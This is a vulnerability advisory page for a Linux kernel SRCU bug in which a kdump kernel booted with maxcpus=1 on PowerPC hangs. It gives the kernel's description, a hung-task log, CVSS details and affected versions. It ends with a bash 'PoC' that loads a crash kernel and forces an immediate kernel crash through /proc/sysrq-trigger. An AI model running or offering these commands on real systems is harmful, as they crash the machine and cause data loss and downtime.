Security Vulnerability Report
CVE-2023-53671 CVSS 5.5 MEDIUM

Published: 2025-10-07 16:15:51
Last Modified: 2026-02-26 23:15:01
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

srcu: Delegate work to the boot cpu if using SRCU_SIZE_SMALL

Commit 994f706872e6 ("srcu: Make Tree SRCU able to operate without snp_node array") assumes that cpu 0 is always online. However, there really are situations when some other CPU is the boot CPU, for example, when booting a kdump kernel with the maxcpus=1 boot parameter.

On PowerPC, the kdump kernel can hang as follows:

...
[ 1.740036] systemd[1]: Hostname set to <xyz.com>
[ 243.686240] INFO: task systemd:1 blocked for more than 122 seconds.
[ 243.686264] Not tainted 6.1.0-rc1 #1
[ 243.686272] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
[ 243.686281] task:systemd state:D stack:0 pid:1 ppid:0 flags:0x00042000
[ 243.686296] Call Trace:
[ 243.686301] [c000000016657640] [c000000016657670] 0xc000000016657670 (unreliable)
[ 243.686317] [c000000016657830] [c00000001001dec0] __switch_to+0x130/0x220
[ 243.686333] [c000000016657890] [c000000010f607b8] __schedule+0x1f8/0x580
[ 243.686347] [c000000016657940] [c000000010f60bb4] schedule+0x74/0x140
[ 243.686361] [c0000000166579b0] [c000000010f699b8] schedule_timeout+0x168/0x1c0
[ 243.686374] [c000000016657a80] [c000000010f61de8] __wait_for_common+0x148/0x360
[ 243.686387] [c000000016657b20] [c000000010176bb0] __flush_work.isra.0+0x1c0/0x3d0
[ 243.686401] [c000000016657bb0] [c0000000105f2768] fsnotify_wait_marks_destroyed+0x28/0x40
[ 243.686415] [c000000016657bd0] [c0000000105f21b8] fsnotify_destroy_group+0x68/0x160
[ 243.686428] [c000000016657c40] [c0000000105f6500] inotify_release+0x30/0xa0
[ 243.686440] [c000000016657cb0] [c0000000105751a8] __fput+0xc8/0x350
[ 243.686452] [c000000016657d00] [c00000001017d524] task_work_run+0xe4/0x170
[ 243.686464] [c000000016657d50] [c000000010020e94] do_notify_resume+0x134/0x140
[ 243.686478] [c000000016657d80] [c00000001002eb18] interrupt_exit_user_prepare_main+0x198/0x270
[ 243.686493] [c000000016657de0] [c00000001002ec60] syscall_exit_prepare+0x70/0x180
[ 243.686505] [c000000016657e10] [c00000001000bf7c] system_call_vectored_common+0xfc/0x280
[ 243.686520] --- interrupt: 3000 at 0x7fffa47d5ba4
[ 243.686528] NIP: 00007fffa47d5ba4 LR: 0000000000000000 CTR: 0000000000000000
[ 243.686538] REGS: c000000016657e80 TRAP: 3000 Not tainted (6.1.0-rc1)
[ 243.686548] MSR: 800000000000d033 <SF,EE,PR,ME,IR,DR,RI,LE> CR: 42044440 XER: 00000000
[ 243.686572] IRQMASK: 0
[ 243.686572] GPR00: 0000000000000006 00007ffffa606710 00007fffa48e7200 0000000000000000
[ 243.686572] GPR04: 0000000000000002 000000000000000a 0000000000000000 0000000000000001
[ 243.686572] GPR08: 000001000c172dd0 0000000000000000 0000000000000000 0000000000000000
[ 243.686572] GPR12: 0000000000000000 00007fffa4ff4bc0 0000000000000000 0000000000000000
[ 243.686572] GPR16: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
[ 243.686572] GPR20: 0000000132dfdc50 000000000000000e 0000000000189375 0000000000000000
[ 243.686572] GPR24: 00007ffffa606ae0 0000000000000005 000001000c185490 000001000c172570
[ 243.686572] GPR28: 000001000c172990 000001000c184850 000001000c172e00 00007fffa4fedd98
[ 243.686683] NIP [00007fffa47d5ba4] 0x7fffa47d5ba4
[ 243.686691] LR [0000000000000000] 0x0
[ 243.686698] --- interrupt: 3000
[ 243.686708] INFO: task kworker/u16:1:24 blocked for more than 122 seconds.
[ 243.686717] Not tainted 6.1.0-rc1 #1
[ 243.686724] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
[ 243.686733] task:kworker/u16:1 state:D stack:0 pid:24 ppid:2 flags:0x00000800
[ 243.686747] Workqueue: events_unbound fsnotify_mark_destroy_workfn
[ 243.686758] Call Trace:
[ 243.686762] [c0000000166736e0] [c00000004fd91000] 0xc00000004fd91000 (unreliable)
[ 243.686775] [c0000000166738d0] [c00000001001dec0] __switch_to+0x130/0x220
[ 243.686788] [c000000016673930] [c000000010f607b8] __schedule+0x1f8/0x
---truncated---

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.1 (versions affected by commit 994f706872e6)
Linux Kernel 6.1.0-rc1 (version confirmed as affected in the vulnerability report)
Linux Kernel 6.0.x series
Linux Kernel 5.19.x series
Linux Kernel 5.15.x LTS series

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
# PoC: Trigger CVE-2023-53671 by booting a kdump kernel with maxcpus=1 on PowerPC.
# This causes a non-zero CPU to be the boot CPU, triggering the SRCU hang.

# Step 1: Configure kdump on a PowerPC system.
# Loading a crash kernel requires kexec_load_disabled to be 0. Writing 1 to it
# disables kexec loading until the next reboot, so check the value here.
[ "$(cat /proc/sys/kernel/kexec_load_disabled)" = "0" ] || { echo "kexec loading is disabled" >&2; exit 1; }

# Step 2: Load a kdump kernel with the maxcpus=1 parameter.
# This forces the kdump kernel to boot with only 1 CPU,
# and on PowerPC, this CPU may not be CPU 0.
kexec -p /boot/vmlinuz-kdump \
    --initrd=/boot/initramfs-kdump.img \
    --append="maxcpus=1 irqpoll nr_cpus=1 reset_devices"

# Step 3: Trigger the crash to boot into the kdump kernel.
echo c > /proc/sysrq-trigger

# Step 4: Observe the system hang.
# After booting into the kdump kernel, the system will hang
# because SRCU tries to delegate work to CPU 0, which is offline.
# Check the kernel logs for:
#   "INFO: task systemd:1 blocked for more than 122 seconds."
#   "INFO: task kworker/u16:1:24 blocked for more than 122 seconds."

# Verification command to check if the system is hung:
dmesg | grep -i "blocked for more than"

# Expected output showing the hang:
# [ 243.686240] INFO: task systemd:1 blocked for more than 122 seconds.
# [ 243.686708] INFO: task kworker/u16:1:24 blocked for more than 122 seconds.
